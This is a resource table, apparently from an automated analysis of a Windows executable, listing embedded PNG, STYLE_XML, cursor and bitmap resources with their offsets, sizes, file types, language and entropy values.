PNG | 0x3d3f30 | 0x4e1 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0088070456365092
PNG | 0x3d4960 | 0x5b0 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.007554945054945
PNG | 0x3d7fd8 | 0x1b3 | PNG image data, 15 x 56, 8-bit/color RGBA, non-interlaced | English | United States | 1.025287356321839
PNG | 0x3d8190 | 0xea | PNG image data, 32 x 8, 8-bit/color RGBA, non-interlaced | English | United States | 1.0299145299145298
PNG | 0x3d8280 | 0x1ad9 | PNG image data, 38 x 114, 8-bit/color RGBA, non-interlaced | English | United States | 1.0016004655899897
PNG | 0x3dcb10 | 0xb43 | PNG image data, 22 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0038154699965314
PNG | 0x3dd658 | 0x609 | PNG image data, 11 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0071197411003237
PNG | 0x3ddc68 | 0x18ae | PNG image data, 43 x 234, 8-bit/color RGBA, non-interlaced | English | United States | 1.0017410572966128
PNG | 0x3df518 | 0x1177 | PNG image data, 43 x 135, 8-bit/color RGBA, non-interlaced | English | United States | 1.0024602997092373
PNG | 0x3d59e8 | 0x25ec | PNG image data, 43 x 330, 8-bit/color RGBA, non-interlaced | English | United States | 1.0011330861145447
PNG | 0x3d4f10 | 0xad3 | PNG image data, 22 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039696860339227
PNG | 0x3e7990 | 0xbc8 | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036472148541113
PNG | 0x3e8558 | 0xc2e | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0035279025016035
PNG | 0x3e4368 | 0x5dd | PNG image data, 15 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.0073284477015323
PNG | 0x3e3dd0 | 0x597 | PNG image data, 15 x 76, 8-bit/color RGBA, non-interlaced | English | United States | 1.0076869322152342
PNG | 0x3e37d8 | 0x5f8 | PNG image data, 15 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.007198952879581
PNG | 0x3e33e8 | 0x228 | PNG image data, 54 x 69, 8-bit/color RGBA, non-interlaced | English | United States | 1.019927536231884
PNG | 0x3e4948 | 0x588 | PNG image data, 22 x 44, 8-bit/color RGBA, non-interlaced | English | United States | 1.0077683615819208
PNG | 0x3dc248 | 0x38a | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0121412803532008
PNG | 0x3dc5d8 | 0x532 | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082706766917293
PNG | 0x3d1a68 | 0x32f | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0134969325153373
PNG | 0x3d1d98 | 0xef8 | PNG image data, 57 x 120, 8-bit/color RGBA, non-interlaced | English | United States | 0.9950417536534447
PNG | 0x3d2c90 | 0x7c | PNG image data, 1 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 0.9919354838709677
PNG | 0x3f52f0 | 0x13c1 | PNG image data, 52 x 252, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021752026893416
PNG | 0x3f7cb0 | 0x37d | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0123180291153415
PNG | 0x3f7918 | 0x395 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0119956379498365
PNG | 0x3f66b8 | 0x125e | PNG image data, 57 x 120, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023394300297745
PNG | 0x3f24d8 | 0x13b4 | PNG image data, 52 x 252, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021808088818398
PNG | 0x3f4f80 | 0x369 | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0126002290950744
PNG | 0x3f4bb0 | 0x3cc | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0113168724279835
PNG | 0x3f3890 | 0x1320 | PNG image data, 57 x 120, 8-bit/color RGBA, non-interlaced | English | United States | 1.002246732026144
PNG | 0x3f8030 | 0x13ac | PNG image data, 52 x 252, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021842732327244
PNG | 0x3faa18 | 0x364 | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.012672811059908
PNG | 0x3fa658 | 0x3ba | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f93e00x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ecbe80x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ef5680x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ef2100x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3edf880x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e91880x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e9b280x2e6PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148247978436657
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e9ee80x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ec8800x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ec5080x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3eb2980x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e9e100xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fad800x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fd8180x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fd4200x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3fc1180x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ef8e80x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f21600x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f1e200x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3f0c800x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e78e80xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d30080x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d2d100x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e31f00x17ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e33700x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e36c00x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e31880x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e64d80xd7PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232558139534884
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e68d00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e65b00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e68380x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e5b680x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e51c80x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3e4ed00x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cd9880x1d3PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019271948608137
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cdb600x1f8PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0138888888888888
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cddf00x67PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States0.9514563106796117
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cdd580x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cde580x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce1f80x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce5980x1c1PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024498886414254
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce7600x153PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0324483775811208
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cea780x15fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113960113960114
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cebd80x100PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03515625
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce8b80x108PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018939393939394
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ce9c00xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cecd80x151PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032640949554896
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cee300x135PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.029126213592233
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d09680xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d17400x129PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0303030303030303
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d05f80x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3d05700x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cff000x12fPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0264026402640265
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3cfa700x48dPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009442060085837
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ff4e80xdd1PNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003109980209217
PNG | 0x404ba0 | 0xd61 | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032116788321168
PNG | 0x405908 | 0x265 | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0179445350734095
PNG | 0x405b70 | 0xbb9 | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036654448517162
PNG | 0x406730 | 0xc66 | PNG image data, 10 x 28, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034656584751103
PNG | 0x407398 | 0xb90 | PNG image data, 10 x 28, 8-bit/color RGBA, non-interlaced | English | United States | 1.0037162162162163
PNG | 0x42a5d0 | 0xb07 | PNG image data, 5 x 5, 8-bit/color RGBA, non-interlaced | English | United States | 1.003896563939072
PNG | 0x429a80 | 0xb50 | PNG image data, 7 x 7, 8-bit/color RGBA, non-interlaced | English | United States | 1.0037983425414365
PNG | 0x4128f0 | 0x2885 | PNG image data, 42 x 348, 8-bit/color RGBA, non-interlaced | English | United States | 1.0010604453870626
PNG | 0x415178 | 0xd8e | PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031700288184437
PNG | 0x415f08 | 0x53b | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082150858849888
PNG | 0x4270e0 | 0x4f3 | PNG image data, 22 x 66, 8-bit/color RGBA, non-interlaced | English | United States | 1.0086819258089976
PNG | 0x41a758 | 0x130f | PNG image data, 22 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0022545603607296
PNG | 0x41ba68 | 0xe74 | PNG image data, 10 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.002972972972973
PNG | 0x41e918 | 0x11ba | PNG image data, 22 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.002423975319524
PNG | 0x41fad8 | 0xece | PNG image data, 11 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0029023746701846
PNG | 0x41c8e0 | 0x11ba | PNG image data, 22 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.002423975319524
PNG | 0x41daa0 | 0xe74 | PNG image data, 10 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.002972972972973
PNG | 0x407f28 | 0x1206 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023840485478976
PNG | 0x40a260 | 0x11bc | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0024229074889868
PNG | 0x409130 | 0x112a | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025034137460174
PNG | 0x40b420 | 0x127a | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023255813953489
PNG | 0x40efc0 | 0xd3e | PNG image data, 15 x 56, 8-bit/color RGBA, non-interlaced | English | United States | 1.003244837758112
PNG | 0x40fd00 | 0xbac | PNG image data, 32 x 8, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036813922356091
PNG | 0x411480 | 0x146a | PNG image data, 56 x 69, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021048603138156
PNG | 0x416448 | 0x122f | PNG image data, 22 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023630504833512
PNG | 0x417678 | 0xdec | PNG image data, 11 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0030864197530864
PNG | 0x418468 | 0x1100 | PNG image data, 42 x 228, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025275735294117
PNG | 0x419568 | 0x11ed | PNG image data, 42 x 140, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023970363913706
PNG | 0x40d758 | 0x1864 | PNG image data, 42 x 330, 8-bit/color RGBA, non-interlaced | English | United States | 1.0003203074951954
PNG | 0x40c6a0 | 0x10b5 | PNG image data, 22 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025718961889174
PNG | 0x4275d8 | 0x124b | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023489216314327
PNG | 0x428828 | 0x1256 | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023434171282488
PNG | 0x4227f8 | 0xf2c | PNG image data, 15 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.002832131822863
PNG | 0x421918 | 0xede | PNG image data, 15 x 76, 8-bit/color RGBA, non-interlaced | English | United States | 1.0028901734104045
PNG | 0x4209a8 | 0xf69 | PNG image data, 15 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.0027883396704689
PNG | 0x423728 | 0xe20 | PNG image data, 22 x 44, 8-bit/color RGBA, non-interlaced | English | United States | 1.0030420353982301
PNG | 0x42b0d8 | 0xdc7 | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031187978451943
PNG | 0x4002c0 | 0xbae | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036789297658864
PNG | 0x400e70 | 0xd91 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.003167290526922
PNG | 0x401c08 | 0xb12 | PNG image data, 1 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.003881439661256
PNG | 0x4371a8 | 0xbc3 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036532713384259
PNG | 0x436508 | 0xc9f | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.003404518724853
PNG | 0x435788 | 0xd7d | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031856356791196
PNG | 0x434b90 | 0xbf7 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0035912504080966
PNG | 0x433ef8 | 0xc96 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034140285536934
PNG | 0x433168 | 0xd8c | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031718569780854
PNG | 0x439790 | 0xbda | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036255767963085
PNG | 0x438af0 | 0xca0 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034034653465347
PNG | 0x437d70 | 0xd80 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031828703703705
PNG | 0x42ff88 | 0xbe2 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036160420775806
PNG | 0x42f2f8 | 0xc8c | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034246575342465
PNG | 0x42e578 | 0xd7b | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031874818893074
PNG | 0x42d990 | 0xbe7 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036101083032491
PNG | 0x42ccf8 | 0xc94 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034161490683229
PNG | 0x42bf78 | 0xd80 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031828703703705
PNG | 0x42bea0 | 0xd4 | PNG image data, 3 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.028301886792453
PNG | 0x43bd88 | 0xbd0 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.003637566137566
PNG | 0x43b0f0 | 0xc97 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034129692832765
PNG | 0x43a370 | 0xd7a | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031884057971014
PNG | 0x432588 | 0xbda | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036255767963085
PNG | 0x4318f8 | 0xc8f | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.003421461897356
PNG | 0x430b70 | 0xd86 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031773541305604
PNG | 0x402720 | 0x1908 | PNG image data, 50 x 178, 8-bit/color RGBA, non-interlaced | English | United States | 0.9887640449438202
PNG | 0x404028 | 0xb75 | PNG image data, 3 x 61, 8-bit/color RGBA, non-interlaced | English | United States | 1.0037504261847938
PNG | 0x4108b0 | 0xbd0 | PNG image data, 9 x 51, 8-bit/color RGBA, non-interlaced | English | United States | 1.003637566137566
PNG | 0x425b70 | 0x1570 | PNG image data, 18 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0020043731778425
PNG | 0x424548 | 0x1623 | PNG image data, 18 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0019410622904534
STYLE_XML | 0x330840 | 0x4e01 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.1839851770243878
STYLE_XML | 0x363000 | 0x4b09 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.20396689052006872
STYLE_XML | 0x3972a8 | 0x4aa6 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.20460491889063318
STYLE_XML | 0x3c8a70 | 0x4a18 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.20397511598481655
                                                                                                                                                                                                                                                                                                                                                                                                                  STYLE_XML0x3fdb900x1955HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1918272937548188
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f0a80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f1e00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f2c00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f4100x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f5600x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f6b00x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f8000x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32f9500x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32faa00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32fbf00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32fd400x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32fe900x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x32ffe00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x3301300x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x3302800x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x3303d00x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x465c700x134dataEnglishUnited States0.20454545454545456
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x465dc00x134dataEnglishUnited States0.2857142857142857
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x465f100x134dataEnglishUnited States0.4675324675324675
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4660600x134dataEnglishUnited States0.2532467532467532
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4661b00x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.40584415584415584
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4663000x134dataEnglishUnited States0.4383116883116883
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4664500x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4665a00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4666f00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4512987012987013
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4668400x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x4669900x134dataEnglishUnited States0.4448051948051948
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_CURSOR0x466ae00x134dataEnglishUnited States0.525974025974026
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43f3b00x62cDevice independent bitmap graphic, 324 x 9 x 4, image size 1476EnglishUnited States0.2430379746835443
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43f2c80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.5818965517241379
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43f9e00x4a0Device independent bitmap graphic, 144 x 15 x 4, image size 1080EnglishUnited States0.3783783783783784
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x43fe800x197aDevice independent bitmap graphic, 144 x 15 x 24, image size 6482, resolution 2834 x 2834 px/mEnglishUnited States0.380098129408157
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4418000xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.51
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x441ad80xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.515
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x441db00xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.43
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4420880xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.44
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4427c80x182aDevice independent bitmap graphic, 128 x 16 x 24, image size 6146, resolution 2834 x 2834 px/mEnglishUnited States0.2924345295829292
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x4423600x468Device independent bitmap graphic, 128 x 16 x 4, image size 1024EnglishUnited States0.3058510638297872
                                                                                                                                                                                                                                                                                                                                                                                                                  RT_BITMAP0x443ff80x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4803030303030303
